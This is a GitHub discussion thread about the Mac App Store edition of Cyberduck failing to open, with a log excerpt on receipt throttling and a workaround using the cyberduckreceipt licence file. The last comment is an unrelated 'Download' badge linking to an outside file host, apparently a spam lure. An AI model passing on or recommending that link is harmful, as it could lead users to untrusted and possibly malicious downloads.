### DISCUSSION TITLE
Cyberduck Mac App Store edition "damaged and can't be opened"

### DISCUSSION THREAD

**Discussion by Xjs** [iterate-ch/cyberduck#15478] [Q&A] [answered]
**Describe the bug**
Since today, I can't open the Mac App Store version of Cyberduck anymore. It says »“Cyberduck” is damaged and can’t be opened. Delete “Cyberduck” and download it again from the App Store.«

Even if I follow the instructions and delete & redownload it the error reappears. The website version from cyberduck.io works. (I copied my preferences file from ~/Library/Containers/ch.sudo.cyberduck/Data/Library/Preferences to ~/Library/Preferences so I can continue working for now.)

**To Reproduce**
1. Go to the Mac App Store
2. Download Cyberduck
3. Try to open it

**Expected behavior**
Cyberduck opens without problems.

**Screenshots**
![Screenshot 2023-12-15 at 15 30 08](https://github.com/iterate-ch/cyberduck/assets/58270/ac15296c-0805-47e5-8454-c864a2050aa4)

**Desktop (please complete the following information):**
 - OS: macOS 14.1.1 (23B81), 2020 M1 MacBook Pro
 - Cyberduck Version: 8.7.1 (Mac App Store)

**Log Files**
[cyberduck.log from ~/Library/Containers/ch.sudo.cyberduck/Data/Library/Logs](https://github.com/iterate-ch/cyberduck/files/13686360/cyberduck.log) (I hope this is the right one)

[cyberduck-crash.log](https://github.com/iterate-ch/cyberduck/files/13686345/cyberduck-crash.log)
(from Console.app, with search filter for the string "cyberduck") — let me know if you need some more specific context from the logs.

**Additional context**
It definitely still worked yesterday (2023-12-14), not sure if it even did today in the morning.

**Comment by dkocher** [comment]
The output from the error log indicates an issue with the `storekitagent` that validates the purchase receipt to connect to the Mac App Store server.

```
error	15:33:27.450462+0100	storekitagent	ch.sudo.cyberduck: Failed to renew receipt for exit(173): Error Domain=ASDErrorDomain Code=603 "Request throttled" UserInfo={NSLocalizedDescription=Request throttled, NSLocalizedFailureReason=Unified receipt is valid and current}
```

**Reply by Xjs** [reply]
Thanks for the pointer. Good to know that nobody else seems affected. I have also contacted Apple's Support about this but I'm not very hopeful. Do you have any ideas on how I can proceed here to make it work again? If all else fails, can you convert my Mac App Store purchase into a non-app-store license?

**Reply by tatze96** [reply, marked as answer]
If you've started the App Store version successfully before, you should see a cyberduckreceipt file within the [application support folder](https://docs.cyberduck.io/cyberduck/support/#application-support-folder) that'll be detected as a license for the standalone version from our [website](https://cyberduck.io/download/).

**Reply by Xjs** [reply]
Thank you! To whom it may concern, the App Store version started working again after the holidays for no reason apparent to me. However, if this happens again I should be able to use the cyberduckreceipt file, thanks for this pointer. :)

**Comment by Xjs** [comment]
As I wrote before, for me it started working again; however, the comment by @tatze96 regarding the cyberduckreceipt file in the application support folder would answer my initial concern should it happen again.

**Comment by og-jeffz1** [comment]
<p align="center">
  <a href="https://filehub.online/a2zfile/">
    <img src="https://img.shields.io/badge/⭐%20Download-0F172A?style=for-the-badge&logo=github&logoColor=white&labelColor=111827" alt="Download">
  </a>
</p>
